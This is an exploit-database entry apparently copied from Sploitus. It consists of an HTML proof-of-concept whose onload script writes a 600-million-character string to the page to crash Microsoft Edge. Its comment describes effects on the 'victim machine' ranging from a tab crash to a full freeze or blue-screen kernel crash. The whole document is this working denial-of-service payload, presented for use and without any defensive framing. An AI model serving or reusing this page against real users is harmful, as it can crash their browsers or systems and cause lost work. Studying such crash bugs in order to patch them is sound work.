Share
## https://sploitus.com/exploit?id=1337DAY-ID-33477
<html>

<head>
<!--Well there are multiple behavior of running this exploit on victim machine
1-Nothing happen
2-The current tab of ms-edge crash
3-The machine freeze and sometime even the kernel crash (a bsod appear)
4-sometime a black line appear
-->
<script>

function blah() {	
  var buff = '\x41';
  var buffer = buff.repeat(600000000);
  document.write(buffer);

}

</script>

</head>

<body onload=blah()>

</body>

</html>